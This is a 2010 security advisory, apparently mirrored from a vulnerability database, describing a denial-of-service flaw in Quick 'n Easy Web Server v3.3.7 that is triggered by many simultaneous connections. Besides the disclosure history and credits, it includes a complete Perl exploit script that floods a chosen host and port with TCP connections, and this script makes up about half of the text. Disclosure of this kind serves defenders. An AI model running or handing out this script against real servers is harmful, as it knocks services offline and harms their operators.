[DCA-0008] Quick 'n Easy WEB Server DoS

2010-08-14T00:00:00
ID SECURITYVULNS:DOC:24494
Type securityvulns
Reporter Securityvulns
Modified 2010-08-14T00:00:00

Description

[DCA-0008]

[Software]

  • Quick 'n Easy WEB Server

[Vendor Product Description]

  • Do you want run your own personal webserver or just want to test your ASP/PHP scripts before you upload them to your webhosting server? No problem, Quick ’n Easy Web Server can handle it! Quick ‘n Easy Web Server for Windows 98/NT/XP/2003 and Vista(32 bits) is very easy to configure, it supports native ASP (no need to install IIS!) and it looks pretty cool too!

[Bug Description]

  • Quick 'n Easy Web Server can't handle multiple/simultaneous connections leading to Denial-of-Service

[History]

  • Advisory sent to vendor on 06/14/2010.
  • No response from vendor
  • Public advisory & exploit 08/02/2010.

[Impact]

  • Low

[Affected Version]

  • Quick 'n Easy WEB Server v3.3.7
  • Prior versions may also be vulnerable

[Code]

!/usr/bin/perl

use IO::Socket;

    if (@ARGV < 1) {
            usage();
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];
    $conn   = $ARGV[2];

    $num    = 0;

    print "[+] Sending request...\n";

    while ( $num <= $conn ) {
            system("echo -n .");
            $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

    close($s);
    $num++;
    }

    print "\n[+] Done!\n";

sub usage() { print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n"; print "[-] Example: ". $0 ." 127.0.0.1 80 1200\n"; exit; }

[Credits]

Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br

[Greetz] Crash and all Dclabs members.

-- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br